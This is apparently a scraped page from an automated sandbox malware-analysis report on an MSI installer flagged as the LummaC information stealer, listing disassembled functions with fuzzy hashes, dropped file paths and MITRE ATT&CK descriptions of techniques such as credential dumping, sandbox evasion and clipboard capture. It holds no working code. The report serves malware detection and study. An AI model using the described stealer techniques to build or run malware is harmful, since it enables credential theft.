Opcode ID: 05ba705d4abcc1caf8ae517ee4ae023d52f44c0ca7fa6ea03e4d84e5a78e3aaf
Instruction ID: f82dd9b0d87d4a5d6c48483010ad98791815e4d23863ac411e0dcac4d361aaf7
Opcode Fuzzy Hash: 05ba705d4abcc1caf8ae517ee4ae023d52f44c0ca7fa6ea03e4d84e5a78e3aaf
Instruction Fuzzy Hash: 57515A33A4A98047D328C93C5C213FA6A934FD7230B2D977FE5B2873E1C56D489A5306

Function 004029C0 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fb7f438c5c4dca9d542d010704f564aa8c339b5d82f191b9433bdcfd20d3972
Instruction ID: d41090bbc5cdf1eee4b9e767fbef583de22e64e79b7a5adf37564b72c8c73a6c
Opcode Fuzzy Hash: 8fb7f438c5c4dca9d542d010704f564aa8c339b5d82f191b9433bdcfd20d3972
Instruction Fuzzy Hash: 8741FA3170C2654BC7289E2D8D5813ABBD24FC5618F0DCA7AE8C5AB7CBE5789D0097C9

Function 0040D9D6 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0501dee0cd475f0528001a804b543f83bb980b08efb0e061e04e26c6bcac48f
Instruction ID: 9fa01659ad8de31616e7a3bece4b0ebd12d10b8bf800f35ceca4d3f4b48f7db6
Opcode Fuzzy Hash: f0501dee0cd475f0528001a804b543f83bb980b08efb0e061e04e26c6bcac48f
Instruction Fuzzy Hash: 5251BF32B656018FD31CCF7CCC82666B6E3EB9531972DC53E9056C77A5DA38E8028748

Function 0043B7E0 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 459afc3e467d5247fe6443b366a0b0acd94dcc8ddc2ffa92890ff12f6ad588ef
Instruction ID: a12b8c0182a61b8c0dcb24e574365e2446023a880a9609403b6df3a4a4656157
Opcode Fuzzy Hash: 459afc3e467d5247fe6443b366a0b0acd94dcc8ddc2ffa92890ff12f6ad588ef
Instruction Fuzzy Hash: BB31593BA19B15CFE7089F79D89021B77A2FBCA350F2A847DDA8543652CB35D9018781

Function 0040D136 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8c4e62ba9308e78600a03fb08915fb589ea36e633141cd22722de6b1452e6b6
Instruction ID: 2adf1b471041e318d085131b5c25906aa0ef628fdecf1c7cc439bd873dbe0119
Opcode Fuzzy Hash: d8c4e62ba9308e78600a03fb08915fb589ea36e633141cd22722de6b1452e6b6
Instruction Fuzzy Hash: 2A21F736B106018BD72CCB38CCA163B7793ABCA31572DC13E9197C73E9DE34A8018614

Function 0041AEC5 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 952670a55784d431d970a3eed704d470b0aeab0eb4664b3b35544288deaf35a8
Instruction ID: 157f9dc6c30a3f8e7012f38a3543129662c1ccbafda1b3b4c39616780386f915
Opcode Fuzzy Hash: 952670a55784d431d970a3eed704d470b0aeab0eb4664b3b35544288deaf35a8
Instruction Fuzzy Hash: 9E210E7540D3819BC7149B3888012AFFBA1AF93328F149A6DF5D297292D339C847C71B

Function 00402B90 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce5268b2cb12f830d2f938287316391b2315b06526712d89e8233c91e4a213b8
Instruction ID: 96f90f60e8dd0990346840b1114267e9a804311747d2bbb38bbaf23e5c27bc8a
Opcode Fuzzy Hash: ce5268b2cb12f830d2f938287316391b2315b06526712d89e8233c91e4a213b8
Instruction Fuzzy Hash: 4E11D632B182220BE75CDE62D8F967B6352E78931070A013EDE47673D1CEB0F801D264

Function 004180EC Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4720f93b5e583e1436a46f0c8ff2d578415a284bcd34cb36c7c667644f46f1a2
Instruction ID: e867d9d1f28d7a5eba1ee3aa62fd3901ca7eafcffc61e3722708c4ddc888ec81
Opcode Fuzzy Hash: 4720f93b5e583e1436a46f0c8ff2d578415a284bcd34cb36c7c667644f46f1a2
Instruction Fuzzy Hash: 6A019675A08340ABE3608F289940BABB7E6B78A314F245A2DE5C493255CB75D8428B9D

Function 00432AA0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 57554b220478db5cbed8bb508ca5b9341bb5a8124f106d97950563f0cb4ed476
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: FB112933A042D40EC3268D3C8900566BFA31B97234F1D539AF4B59B2D2D6668D8B9359

Function 00428DB0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a011a27137bedbfde1d81e6990c257233fd33e675cfd29fd3a4a4d1d0f128886
Instruction ID: 38d02f156ba9bea008bfc3cbf089b3dc91c799dc872ea954a9214ded2d150559
Opcode Fuzzy Hash: a011a27137bedbfde1d81e6990c257233fd33e675cfd29fd3a4a4d1d0f128886
Instruction Fuzzy Hash: E301B5F1B0131147D7209E15A4C0B2FB2A96FA0708F58443ED80497382DFB9FC08C6A9

Function 0042A58E Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07a30f681505e4db35b5ed8e54df63b63ef7e515c4b9fc49bbc63e0401b10513
Instruction ID: 12b2805a1f20fa8b6142eba5500c80610d2c3edaf282c8c7ce7b4e803315b4ad
Opcode Fuzzy Hash: 07a30f681505e4db35b5ed8e54df63b63ef7e515c4b9fc49bbc63e0401b10513
Instruction Fuzzy Hash: 45014C293456504BC31A8B39D8E0763BBE2EFE7301F5D85ADC4D28B74AC67ED8064706

Function 0041805C Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8d66e0010325b6422922c937078ec9626dcdbb334fde7781a2277a78e48d2e8b
Instruction ID: 8711fe80fd9cdcc946cfeee52c3a971414c24b006f2a8bfd417734f7af7e8c33
Opcode Fuzzy Hash: 8d66e0010325b6422922c937078ec9626dcdbb334fde7781a2277a78e48d2e8b
Instruction Fuzzy Hash: BA0149746142048BE724CB249C21BBBBBD1FB8F304F151A2DE1C5A3191CF64D880C60D

Function 0040A4FC Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fe6f0fb5443b9a01c1fbd4e09ae81bf7540544174fd81e1490294d2a34f9ea0
Instruction ID: 0c7f04cba0ebecf99243f2c815fb382dab3cd3855d7a05e12ca6b616032a23fd
Opcode Fuzzy Hash: 8fe6f0fb5443b9a01c1fbd4e09ae81bf7540544174fd81e1490294d2a34f9ea0
Instruction Fuzzy Hash: F6C012BAD8002063C3298A1088601F8A2300686428B0BA328CC5A33B60C1299C4284E8

Function 00430E8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00430EC1
GetSystemMetrics.USER32 ref: 00430ED0

Strings

, xrefs: 00430F7B

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 1a07bbeef6fc36448364366884fe18d673ec2a3ba7b128be2150e116853cae2f
Instruction ID: c462c863d7540d378f15546e975ceae7bdcd2c3f8effd4f67c5b55e1d1f3667c
Opcode Fuzzy Hash: 1a07bbeef6fc36448364366884fe18d673ec2a3ba7b128be2150e116853cae2f
Instruction Fuzzy Hash: 7A3183B09143148FDB40EF69D98965EBBF4BB88304F01853DE499DB364D774A948CF86

Function 0040B7A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00408A7E), ref: 0040B7A6
FreeLibrary.KERNEL32 ref: 0040B7C7

Strings

#v, xrefs: 0040B7A6, 0040B7C7

Memory Dump Source

Source File: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_dxdiag.jbxd

Similarity

API ID: FreeLibrary
String ID: #v
API String ID: 3664257935-554117064
Opcode ID: f6b9515368add2d154cce34743dfe1eab3236b69c5cd9e8125fcbaf6a12fe06c
Instruction ID: 336dde16cfeb40de3b2ef609bf2c051ccccdb53c03003955ec431401e460c0aa
Opcode Fuzzy Hash: f6b9515368add2d154cce34743dfe1eab3236b69c5cd9e8125fcbaf6a12fe06c
Instruction Fuzzy Hash: BEC0027A808400AFCE113FE5FE0A8283E25EB4670670061F4FD4541076DB324936FFA9

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report msit.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\5403f1.rbs

C:\Windows\Installer\5403ef.msi

C:\Windows\Installer\MSI602.tmp

C:\Windows\Installer\MSI670.tmp

C:\Windows\Installer\MSI6FE.tmp

C:\Windows\Installer\MSI79B.tmp

C:\Windows\Installer\MSI839.tmp

C:\Windows\Installer\MSI982.tmp

C:\Windows\Installer\MSIACB.tmp

C:\Windows\Installer\MSIAEB.tmp

C:\Windows\Installer\SourceHash{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}

C:\Windows\Installer\inprogressinstallinfo.ipi

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Windows Analysis Report
msit.msi

Function 00435870 Relevance: 26.9, APIs: 11, Strings: 4, Instructions: 661
memorycomCOMMON

Function 0040E458 Relevance: 14.2, APIs: 2, Strings: 7, Instructions: 651
COMMON

Function 0040CDD7 Relevance: 10.3, Strings: 8, Instructions: 291
COMMON

Function 004227B0 Relevance: 9.3, APIs: 1, Strings: 4, Instructions: 529
COMMON

Function 00420B10 Relevance: 8.0, Strings: 6, Instructions: 515
COMMON

Function 00408920 Relevance: 6.1, APIs: 4, Instructions: 116
threadCOMMON

Function 0040AAE0 Relevance: 5.4, Strings: 4, Instructions: 370
COMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre